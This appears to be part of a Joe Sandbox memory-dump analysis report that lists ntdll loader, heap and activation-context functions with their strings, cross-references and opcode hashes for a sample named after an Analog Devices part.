Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017599ED
minkernel\ntdll\ldrinit.c, xrefs: 01759A11, 01759A3A

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 3e34686ed38b140041c13879e59595e2657c9626033efe229cffb361daafaf5e
Instruction ID: 6ac2428d054769c7e05b1aa004293e299b1acab030aaf61c5ba5cb9ed4d9a22b
Opcode Fuzzy Hash: 3e34686ed38b140041c13879e59595e2657c9626033efe229cffb361daafaf5e
Instruction Fuzzy Hash: 0351C371248305DFE724DF24CC95BABB7E9FB84658F00491DFA869B154DB70EA04CBA2

Function 01732674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01772178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01772180
SXS: %s() passed the empty activation context, xrefs: 01772165
RtlGetAssemblyStorageRoot, xrefs: 01772160, 0177219A, 017721BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0177219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017721BF

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
Instruction ID: b72f5d8edd7a7f7e3e7b27ebfd643e21012ce80daeef5096d14d9ec7115d4e9b
Opcode Fuzzy Hash: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
Instruction Fuzzy Hash: 34313736F4121577EB229A999C45F5BFBB8FBA5A90F0501A9FB0567243D2709E00C3E0

Function 0173C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01778177, 017781EB
minkernel\ntdll\ldrinit.c, xrefs: 0173C6C3
Loading import redirection DLL: '%wZ', xrefs: 01778170
minkernel\ntdll\ldrredirect.c, xrefs: 01778181, 017781F5
LdrpInitializeProcess, xrefs: 0173C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 017781E5

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 39c56943bd9af926b76ad5a2df6b911dee2a86848bd64a0aa5b24f03432f57cf
Instruction ID: d34d51b1804a8d7d818d09b70db97988a31b7bebf4e1f2aa3d453d5b709494bd
Opcode Fuzzy Hash: 39c56943bd9af926b76ad5a2df6b911dee2a86848bd64a0aa5b24f03432f57cf
Instruction Fuzzy Hash: 4731E4726443469BC324EB28DC4DE2BF7E4EF94B24F05055CF945AB395DA20ED05C7A2

Function 0174096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01742DF0: LdrInitializeThunk.NTDLL ref: 01742DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D74

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
Instruction ID: 92f90164c844c62b1840711b8f71fc93d0f70a1d7fc1bd192ee9215195e466b9
Opcode Fuzzy Hash: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
Instruction Fuzzy Hash: 7F425A71900715DFDB21CF28C884BEAB7F5BF48314F1445A9EA89EB245E770AA84CF61

Function 0170A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 0170A3E7
LdrResFallbackLangList Exit, xrefs: 0170A3FF
LdrResFallbackLangList Enter, xrefs: 0170A3EF
6, xrefs: 0170A3F7

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
Instruction ID: 6b5fab2b05822e66bc1593e080ac49b4c5c06391cdab119b52a5d74b908c21b5
Opcode Fuzzy Hash: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
Instruction Fuzzy Hash: 7CC17A74108382CFD712CF68C444B6AF7E4FF94704F0489AAF9968B296E735CA49CB52

Function 01738402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01738421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0173855E
LdrpInitializeProcess, xrefs: 01738422
@, xrefs: 01738591

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
Instruction ID: 2c02da9cc79767f5c5097165c3a35a72ed50912344d0495560c96f4a54772ddc
Opcode Fuzzy Hash: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
Instruction Fuzzy Hash: 09918A71548345AFDB22DF65CC44FABFBE8BB88654F400A2EFA8496146E334D904CB63

Function 0173273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 017328D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017721D9, 017722B1
SXS: %s() passed the empty activation context, xrefs: 017721DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017722B6

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
Instruction ID: 6d92cf1c06219d69ddeb507bc62e3a9a9fdb3f0e1a32fd5fcbd1f5812668fb04
Opcode Fuzzy Hash: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
Instruction Fuzzy Hash: 75A1BD31A05229DBDB24CF68CC88BA9F7B0BF98314F1541E9D918AB252D7309E80CF90

Function 01734AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 0177342A
RtlDeactivateActivationContext, xrefs: 01773425, 01773432, 01773451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01773456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01773437

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
Instruction ID: fad418318665089b0e383073739837fba6b58751ccf00b601d2caecd4ee660db
Opcode Fuzzy Hash: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
Instruction Fuzzy Hash: D76123766407129BDB2ACF1DC845B3AF7E1FF80B60F14856DE9569B282DB30E801CB95

Function 017064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0176106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01761028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017610AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01760FE5

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
Instruction ID: 6968669dacd9d60fa361340d90a666c3680b1b7529734d37f0a93f55aac33b42
Opcode Fuzzy Hash: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
Instruction Fuzzy Hash: 6971C0B19043459FCB22DF14C888B9BBFE8AF54764F500468FD498B28AD375D588CBD2

Function 0172245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0176A992
apphelp.dll, xrefs: 01722462
minkernel\ntdll\ldrinit.c, xrefs: 0176A9A2
LdrpDynamicShimModule, xrefs: 0176A998

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
Instruction ID: b4e4a11fbc125b6cfd04a41dd5bea63d72fa0e0e5cc8e7937ab9bc6e198517d2
Opcode Fuzzy Hash: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
Instruction Fuzzy Hash: B4310575640301ABDB319F5DD885A6BF7B9FB84B20F25405EF91177249CB709982CB90

Function 017129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0171327D
HEAP[%wZ]: , xrefs: 01713255
HEAP: , xrefs: 01713264

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
Instruction ID: 6d15e9f23fcc7b985024aaa513b4c227498258b84d4e6e7ae930f0453a6790f4
Opcode Fuzzy Hash: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
Instruction Fuzzy Hash: E892BB71A042499FDB25CF6CC444BAEFBF1FF48310F288499E859AB39AD334A945CB50

Function 01710770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 017650CA
HEAP[%wZ]: , xrefs: 017650AE
HEAP: , xrefs: 017650BD

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
Instruction ID: b50fad2288d3af9a540c298a0212bf1f4102bbdf4e293c32a01ac97355dab7d4
Opcode Fuzzy Hash: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
Instruction Fuzzy Hash: 9AF19B70604606DFEB25CF6CC894B6AF7B6FF44704F1481A9E9169B389D734EA81CB90

Function 01726962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01726C24
, xrefs: 0176CA51

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
Instruction ID: 18224537fed7c46732b82fd76809850e9442ee00d9b23d783f49fb08d1611212
Opcode Fuzzy Hash: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
Instruction Fuzzy Hash: 1DC29E716083519FDB2ACF28C981BABFBE5AF98714F04892DF9C987241D734D846CB52

Function 016FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0175C1E4
FilterFullPath, xrefs: 0175C2E6
UseFilter, xrefs: 016FA1C1

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
Instruction ID: 405f9a3eed8a2e6fd5ce2ad515a70e1575a7b7ed6d1beeac8ded358e18aa1874
Opcode Fuzzy Hash: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
Instruction Fuzzy Hash: F1A19F759116299BDB32DF68CC88BAAFBB8EF44700F1041E9EA08A7251D7759EC4CF50

Function 01720BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0176A117
Failed to allocated memory for shimmed module list, xrefs: 0176A10F
minkernel\ntdll\ldrinit.c, xrefs: 0176A121

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
Instruction ID: 9ce375115e4361e83c347f7ff01ed60a140901598121c42f60c15f9a00ed0b4f
Opcode Fuzzy Hash: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
Instruction Fuzzy Hash: 0071C1B0A00205DFDB29DF68C984ABEF7F4FB44714F14846DE912AB255E734A982CB60

Function 01710A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0176534D
HEAP[%wZ]: , xrefs: 01765335
HEAP: , xrefs: 01765342

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
Instruction ID: 6e9cb89640ca07e9a50ae8106ebdfcef3ee193483f27b9315d50c813d854c0bb
Opcode Fuzzy Hash: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
Instruction Fuzzy Hash: E561AD71600301DFDB29CF28C884B6AFBE5FF45708F14859DE84A8B29AD770E981CB91

Function 0173C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 017782D7
LdrpInitializePerUserWindowsDirectory, xrefs: 017782DE
minkernel\ntdll\ldrinit.c, xrefs: 017782E8

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
Instruction ID: 4a029f270f28416f950b7d4648d844390306921eb8a395bcb934f2194fae3fe3
Opcode Fuzzy Hash: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
Instruction Fuzzy Hash: FB41D471544301ABD722EB68DC49B5BF7E8EF84760F10892EFA45D7299EB70D800CB91

Function 017BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 017BC212
@, xrefs: 017BC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017BC1C5

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
Instruction ID: d6694379843f0eaec07ac3677361fba0e47dfae4ec7e778a0ddfa10118a2442b
Opcode Fuzzy Hash: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
Instruction Fuzzy Hash: AE416371E04219EBEB12DBD8C885FEEFBB8AB18700F14816AE605F7244D7749A45CB50

Function 01794144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01794225
LdrpResValidateFilePath Enter, xrefs: 01794160
LdrpResValidateFilePath Exit, xrefs: 01794172

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
Instruction ID: 815eb06b1589056d20fee3e1ae5f6d6279fa793dd7358762c142dbd5a1e932c3
Opcode Fuzzy Hash: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
Instruction Fuzzy Hash: DA411472A442588BEF26DBD8EA48BADFBB5FF55340F140499D902EB785D7348906CB10

Function 01784755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0178488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01784888
minkernel\ntdll\ldrredirect.c, xrefs: 01784899

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
Instruction ID: b64ae8b0617f85a8a203d0cbd0cf0640bd8d5d5250768ffc82317bc3ded3be47
Opcode Fuzzy Hash: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
Instruction Fuzzy Hash: D541B232A942529FCB21EE59D840B26FBE5EF49650F06056DED4AD7215E7B0E800CB91

Function 01710BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01765431
HEAP: , xrefs: 0176543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01765449

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
Instruction ID: e91c1bea9fd947b2df7754307dc5d85a711ab080b6e47fd401dada14c67e7847
Opcode Fuzzy Hash: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
Instruction Fuzzy Hash: B911E1313151029FDB29CA1CCC84B7AFBA9FF41659F18819DF806CB259DB34D884C754

Function 017820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01782104
LdrpInitializationFailure, xrefs: 017820FA
Process initialization failed with status 0x%08lx, xrefs: 017820F3

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
Instruction ID: f62c92c9ed9a966060d1c9cd3c36637baac583ba47cf36d9feef9c9532eb8231
Opcode Fuzzy Hash: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
Instruction Fuzzy Hash: 2DF0C875B81308AFE724E64CCC5AF9A77ACEB40B64F21005DF60567685D6B0A544C651

Function 017103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01764D8A

Strings

#%u, xrefs: 01764D82

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
Instruction ID: 7aa0824954ada4e15e293ac44e7a2c44c644ad4e7652f77abea14ae6a549f392
Opcode Fuzzy Hash: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
Instruction Fuzzy Hash: 2C711771A0014A9FDB05DFA8C994FAEBBF8BF18704F144065E905E7259EB34ED45CBA0

Function 0170A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0170AA13
LdrResSearchResource Exit, xrefs: 0170AA25

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
Instruction ID: a725c5ee2c50b1a123f18ebbf317a5082fb39a5938926b987bcf65b11c20104e
Opcode Fuzzy Hash: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
Instruction Fuzzy Hash: 68E16A71E00719EBEF22CA98C984BAEFBBABF58314F10446AED01E7291D7749941CB50

Function 017CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 017CA551
`, xrefs: 017CA44B

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 11b5c460e031d5f26a15f5dff5a47e40c652d69c8a6d866940e07a5ce6d374dd
